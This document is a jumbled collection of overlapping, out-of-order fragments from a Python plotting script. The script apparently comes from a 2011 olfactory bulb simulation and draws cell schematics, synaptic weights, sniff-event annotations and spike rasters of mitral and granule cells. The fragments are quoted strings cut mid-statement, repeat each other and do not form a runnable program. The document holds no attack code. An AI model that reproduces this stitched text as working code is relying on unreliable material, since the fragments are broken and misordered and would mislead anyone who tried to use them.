synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\", "(0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2)", "ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center')", "linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color,", "[] for i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data", "output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts", "raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts =", "in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i -", "i in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data',", "Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) #", "where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) 
# Glom ax.plot([xloc], [9], color=color, marker='o',", "\\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if b >= tstop:", "= raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1],", "span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2)", "Mark sniff interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span =", "every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude", "params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)):", "> 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1))", "import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw)", "read_delayevents() dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt)", "raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi))", "numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5): data.append([]) for m in", "xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28,", "\\ horizontalalignment='center', verticalalignment='center', 
fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events:", "xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx", "tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP", "idx = 0 # for i in mask_a: # if i == 1:", "dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag", "markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns')", "homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18)", "microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path,", "1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\",", "marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary 
dendrite ax.plot([xloc,", "fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0],", "'*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1", "redplt, blueplt], \\ ['sniff event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0,", "\\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('',", "horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center',", "ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span =", "cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir']))", ".28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes =", "wts = read_weightevents() delays = read_delayevents() dt = 1 tstop = xlim[1] x", ") syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\", "markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids,", "= syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) )", "== 1: # 
raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx = 0", "syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5,", "pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi)) fig.savefig(os.path.join(analysis_path, 'fig1.pdf'))", "spikeplot from bulbspikes import * from neuronpy.util import spiketrain from params import sim_var", "ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M", "ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends y", "in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6)", "color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax)", "Sun Mar 6 18:22:04 2011 @author: - \"\"\" import os import numpy from", "\\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in", "i in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data',", "if i == 1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5,", "# stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1])", "yvec, \\ 
where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9],", "0 for i in mask_b: if i == 1: if comp[idx] >= xlim[0]", "neuronpy.util import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir", "magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends y =", "\\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts", "textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms',", "comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\", "raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)',", "def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5):", "import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.))", "horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes()", "\"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'],", "\\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) 
sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0]", "'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3,", "raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1],", "(ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure,", "'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt = 1 tstop = xlim[1]", "syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath,", "draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0,", "+= 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5,", "backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20", "data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for", "raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n", "dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1", "format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) 
#ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int))", "sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i", "handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]:", "xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none')", "= (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax", "horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath,", "ax, color='black'): xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec", "blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) #", "10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec,", "cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) #", "= numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec <", "markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2)", "in breath_events: raster_ax.plot([breath, breath], [ylim[0], 
ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)')", "ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\"", "= 0 for b in breath_events: if b >= tstop: break else: dtidx", "syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white')", "from bulbspikes import * from neuronpy.util import spiketrain from params import sim_var homedir", "spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft =", "sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\", "spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for i in mask_a: #", "# pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1,", "some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays", "range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M =", "'(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath", "schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file", "= [] for i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return", "borderaxespad=0., 
handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)): if breath_events[i] >", "\\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250", "0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc", "+= 1 idx = 0 for i in mask_b: if i == 1:", "fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude')", "color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9],", "18:22:04 2011 @author: - \"\"\" import os import numpy from matplotlib import pyplot", "fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0],", "sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001: cellloc", "linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg =", "i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents():", "= numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt = 1 tstop", "EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if", "xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1))", "ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = 
gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx =", "sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid", "Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir,", "# if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1", "numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts", "verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025,", "= xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP =", "# idx = 0 # for i in mask_a: # if i ==", "bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff", "coding: utf-8 -*- \"\"\" Created on Sun Mar 6 18:22:04 2011 @author: -", "-3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale,", "y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx =", "for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28),", "syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto", 
"ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color)", "draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc))", "# Mark sniff interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span", "syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2.,", "\\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\", "verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width,", "redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt", "pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig", "['sniff event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102),", "bulbspikes import * from neuronpy.util import spiketrain from params import sim_var homedir =", ">= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt)", "\\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes()", "ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) 
#ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)')", "0 for b in breath_events: if b >= tstop: break else: dtidx =", "sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False)", "granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos =", "leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red', 'input onto", "on Sun Mar 6 18:22:04 2011 @author: - \"\"\" import os import numpy", "comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20", "\\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for i in mask_a:", ">= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center',", "#ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) 
ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim)", "bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1]", "ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask,", "import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def", "color='red') # idx += 1 idx = 0 for i in mask_b: if", "sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for", "dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red')", "def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) #", "1., yvec).mask, \\ color=color, linewidth=0.) 
# Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white',", "interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i],", "syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\", "Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw", "break # Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12),", "= gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue')", "ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for i", "5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in range(len(breath_events)): if", "* from neuronpy.util import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path", "label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5)", "< 1., yvec).mask, \\ color=color, linewidth=0.) 
